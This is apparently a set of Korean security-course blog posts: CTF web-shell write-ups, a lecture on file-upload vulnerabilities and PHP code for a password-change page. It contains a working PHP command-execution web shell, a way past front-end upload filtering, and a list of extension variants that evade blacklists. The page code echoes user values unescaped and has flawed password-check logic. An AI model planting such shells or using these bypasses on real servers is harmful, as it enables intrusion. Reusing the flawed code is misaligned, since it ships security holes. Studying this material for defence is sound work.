1. 웹 셸 코드 작성
<?php
echo system($_GET['cmd']);
?>
2. 파일 업로드
2-2. 분석
http response 분석 결과 확장자 구분의 내용이 front 의 스크립트에서 필터링 되는 것을 확인
response를 intercept하여 script를 제거
2-3 파일 재업로드
그런데??? index가 풀려있다?
3. 파일 경로찾기
4. find 파일 찾기
5. 파일 조회하기
| 15차 GET FLAG FILE2 (0) | 2024.02.16 |
|---|---|
| 15차 CTF webshell3 (0) | 2024.02.15 |
| 14차 문제풀이 Web Shell 1 (0) | 2024.02.13 |
| 4-7 마이페이지 만들기 (0) | 2024.02.06 |
| 4-6 게시판 구현하기 (html_entities 적용) (0) | 2024.02.06 |
<?php
echo system($_GET['cmd']);
?>
4. find 명령어로 파일 찾기
5. cat 데이터 조회하기
| 15차 CTF webshell3 (0) | 2024.02.15 |
|---|---|
| 14차 문제풀이 Web Shell 2 (0) | 2024.02.13 |
| 4-7 마이페이지 만들기 (0) | 2024.02.06 |
| 4-6 게시판 구현하기 (html_entities 적용) (0) | 2024.02.06 |
| 4-5 게시판 구현하기 (summernote 적용) (0) | 2024.02.06 |
이름 그대로 파일을 업로드하여 공격을 하는 방법 이를 통해 웹 셸 및 DoS공격이 가능하다.
파일 업로드의 기능에 용량제한 및 개수 제한이 없는 경우 다량의 고용량 데이터를 업로드하여 해당 서버의 Disk를 점유하도록 공격하게 된다면 가용성에 대한 공격 즉 DoS공격이 될 수 있다.
해당공격을 통해 웹 셸을 실행 할 수 있다면 Server Side 공격이 될 것이고 Client Side 소스를 업로드하고 다른 사용자가 해당 파일을 실행하게 한다면 Client Side 공격이 될 수 있다.
Pishing
login.php 파일이 없는 서버에 /phising/login.php 파일을 업로드 한 뒤 로그인을 시키면 사용자는 앞 도메인을 보고 정상적인 사이트로 인식할 수 있다.
Deface 공격
서버에 index.php가 있는경우 index.php를 업로드하여 새로운 index.php를 실행하도록 하는 공격방법이다.
XSS공격
정상적인 index.php가 있다고 한다면 해당 index.php를 다운로드 받고 index.php에 추가적으로 악성스크립트를 삽입 후 재 재업로드하여 공격 할 수 있다.
웹 셸(web shell)은 업로드 취약점을 통하여 시스템에 명령을 내릴 수 있는 코드를 말한다. web shell은 간단한 서버 스크립트 (jsp, php, asp...)로 만드는 방법이 널리 사용되며 이 스크립트들은 웹 서버의 취약점을 통해 업로드된다. 웹셸 설치 시 해커들은 보안 시스템을 피하여 별도의 인증 없이 시스템에 쉽게 접속 가능하다. - 위키백과-
즉 파일 업로드를 통해 해당 서버의 명령어를 입력 할 수 있는 공격 방법이다.
웹 셸을 동작 시켰다면 해당 권한은 해당 프로그램을 실행한 권한과 동일하다.
웹 셸은 서버의 구성에 따라 업로드할 파일이 다르다.
python을 사용하는 서버라면 .py의 코드를, java를 사용한다면 .jsp를, php라면 .php를 올리는 방식이 된다.
php웹셸 예시
<?php
echo system($_GET['cmd']);
?>
1. 웹 셸을 업로드 할 수 있어야한다.(php의 경우 확장자가 .php여야한다.)
2. 웹 셸은 업로드 한 파일을 WAS가 실행 시키기 때문에 경로를 알아야한다.
파일의 업로드 시점에 확장자와 파일의 크기 등을 확인하여 막는다.
확장자가 php라면 막는 식의 블랙리스트의 경우 대응하기 쉽지 않다.
Ex)
- .php -> pHp, php3
- .asp -> .cer .cdx .asa
- .php -> .php3 .html .htm
- .jsp -> .war, jspx, jsv, jsw
등 동작 가능한 확장자 를 모두 기입해야한다.
특정 확장자만 업로드가 가능하도록 화이트리스트 방식을 채택하는 것이 보다 간편하고 강력하다.
Ex)
이미지 업로드의 경우
png, jpg, jpeg, gif 만 업로드 가능하도록
| 15주 File Upload, Download 취약점(LFI, RFI) (0) | 2024.02.15 |
|---|---|
| 13주차 Dos 공격 및 CSRF의 대처방법 (0) | 2024.02.05 |
| 12주차 CSRF (0) | 2024.02.01 |
| 12주차 CSRF (1) | 2024.01.21 |
| 11차 HTML의 DOM 접근 (0) | 2024.01.15 |
비밀번호변경 기능이 있는 마이페이지를 만들어보자
기본적인 틀은 회원가입의 틀을 가져와 사용한다.
CSRF 공격을 방지하기위해 비밀번호 변경 시 현재 비밀번호를 입력하도록 구성한다.
mypage.php
<?php
// 사용자 정보를 받아와 화면에 그린다.
$user = getUserInfo();
// post로 전달 받았다면 비밀번호 로직츨 처리한다.
if ($_SERVER['REQUEST_METHOD'] == 'POST') {
// 비밀번호 변경
$is_currentPw = isset($_POST['currentPw']) && $_POST['currentPw'];
$is_newPw = isset($_POST['newPw']) && $_POST['newPw'];
$is_submit = isset($_POST['submit']);
// 현재 비밀번호를 입력 받아서 맞는지 확인.
$checkPw = checkCurrentPw($_POST['currentPw']);
// 현재 비밀번호를 입력받고, 새 비밀번호를 입력받고, 현재 비밀번호와 입력받은 현재 비밀번호가 같고
// 새로 입력받은 비밀번호로 update가 성공한다면
if ($is_currentPw && $is_newPw && $is_submit
&& $checkPw && updatePassword($_POST['newPw']) ) {
// alert을 띄우고 현재 로그인 페이지로 이동
echo "<script>alert('비밀번호 변경 완료.');
location.href='/login.php'
</script>";
}
}
?>
// 입력 태그
<div class="container">
<main>
<div class="py-5 text-center">
<img class="d-block mx-auto mb-4" src="../assets/images/normaltic_logo.png" alt="" width="72" height="57">
<h2>마이 페이지</h2>
<!-- <p class="lead">하기의 항목을 기입해주세요.</p> -->
</div>
<div class="row g-5">
<div class="">
<!-- <h4 class="mb-3">Billing address</h4> -->
<form class="needs-validation" novalidate method="POST">
<div class="row g-3">
<div class="">
<label for="아이디" class="form-label">아이디</label>
<input readonly type="text" value=
<?php
echo '"'.$user['id'].'"';
?>
class="form-control" name="id" >
<div class="">
</div>
</div>
<div class="">
<label for="이름" class="form-label">이름</label>
<input readonly type="text" value=
<?php
echo '"'.$user['name'].'"';
?>
name="name" class="form-control" id="username" >
<div class="">
</div>
</div>
<div class="">
<label for="현재 비밀번호" class="form-label">현재 비밀번호</label>
<input type="password" name="currentPw" class="form-control" id="username" required>
<?php
if(isset($checkPw)) {
echo '비밀번호가 잘못되었습니다.';
echo "<br>";
}
?>
</div>
</div>
<div class="">
<label for="변경할 비밀번호" class="form-label">변경할 비밀번호</label>
<input type="password" name="newPw" class="form-control" id="username" required>
<div class="">
</div>
</div>
<input type=text vlaue="submit" style="display:none;" name="submit"/>
<button class="w-100 btn btn-primary btn-lg" type="submit">비밀번호 변경</button>
</form>
</div>
</div>
</main>
mypage_function.php
<?php
ini_set('display_errors', 1);
require '/app/lib/db_connection.php';
function getDbConn() {
if (!isset($db_conn)) {
$db_conn = mysqli_connect(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);
$db_conn -> set_charset('utf8');
}
return $db_conn;
}
function getUserInfo() {
$db_conn = getDbConn();
$token = $_COOKIE['REFRESH_TOKEN'];
$sql = 'SELECT USER_ID as id, USER_NM as name FROM user
where REFRESH_TOKEN = ?';
$stmtSQL = $db_conn->prepare($sql);
$stmtSQL->bind_param("s",$token);
$stmtSQL->execute();
$result = $stmtSQL->get_result();
$user = mysqli_fetch_array($result);
// var_dump($user);
return $user;
}
function updatePassword($newPw) {
$db_conn = getDbConn();
$token = $_COOKIE['REFRESH_TOKEN'];
$newPw = hash("sha256", $newPw);
$sql = "update user set PW = ? where REFRESH_TOKEN = ?";
$stmtSQL = $db_conn->prepare($sql);
$stmtSQL->bind_param('ss', $newPw,$token);
$result = $stmtSQL->execute();
return $result;
}
// CSRF공격을 방지하기위해 현재 비밀번호를 입력받고 확인하는 절차를 추가한다.
function checkCurrentPw($currentPw) {
$db_conn = getDbConn();
$token = $_COOKIE['REFRESH_TOKEN'];
$currentPw = hash("sha256", $currentPw);
$sql = "SELECT count(USER_ID) as count FROM user where REFRESH_TOKEN = ? and PW = ?";
$stmtSQL = $db_conn->prepare($sql);
$stmtSQL->bind_param("ss",$token, $currentPw);
$stmtSQL->execute();
$result = $stmtSQL->get_result();
$user = mysqli_fetch_array($result);
return $user['count'];
}
?>
| 14차 문제풀이 Web Shell 2 (0) | 2024.02.13 |
|---|---|
| 14차 문제풀이 Web Shell 1 (0) | 2024.02.13 |
| 4-6 게시판 구현하기 (html_entities 적용) (0) | 2024.02.06 |
| 4-5 게시판 구현하기 (summernote 적용) (0) | 2024.02.06 |
| 4-4 게시판 구현하기 (Preparedstatement 적용) (0) | 2024.02.06 |